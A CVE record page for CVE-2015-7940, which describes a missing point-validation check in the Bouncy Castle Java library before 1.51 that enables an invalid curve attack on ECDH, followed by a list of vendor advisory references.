Back to search
CVE-2015-7940
Published: Nov 9, 2015
Modified: Aug 6, 2024
PUBLISHED
Description
The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an "invalid curve attack."
| Vendor | Product | Versions |
|---|---|---|
n/a | n/a | affected n/a |
References
RHSA-2016:2035
vendor-advisory
x_refsource_REDHAT
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
x_refsource_CONFIRM
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
x_refsource_CONFIRM
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
x_refsource_CONFIRM
79091
vdb-entry
x_refsource_BID
openSUSE-SU-2015:1911
vendor-advisory
x_refsource_SUSE
FEDORA-2015-7d95466eda
vendor-advisory
x_refsource_FEDORA
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
x_refsource_CONFIRM
RHSA-2016:2036
vendor-advisory
x_refsource_REDHAT
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
x_refsource_CONFIRM
USN-3727-1
vendor-advisory
x_refsource_UBUNTU
[oss-security] 20151022 Re: CVE Request: invalid curve attack on bouncycastle
mailing-list
x_refsource_MLIST
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
x_refsource_CONFIRM
1037036
vdb-entry
x_refsource_SECTRACK
[oss-security] 20151022 CVE Request: invalid curve attack on bouncycastle
mailing-list
x_refsource_MLIST
DSA-3417
vendor-advisory
x_refsource_DEBIAN
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
x_refsource_CONFIRM
1037046
vdb-entry
x_refsource_SECTRACK
1037053
vdb-entry
x_refsource_SECTRACK
https://www.oracle.com/security-alerts/cpuapr2020.html
x_refsource_MISC
Security Training
Train your team to recognize and prevent security threats with our comprehensive security awareness program.
Start TrainingVulnerability Scanning
Discover vulnerabilities in your applications and infrastructure before attackers do.
Scan Now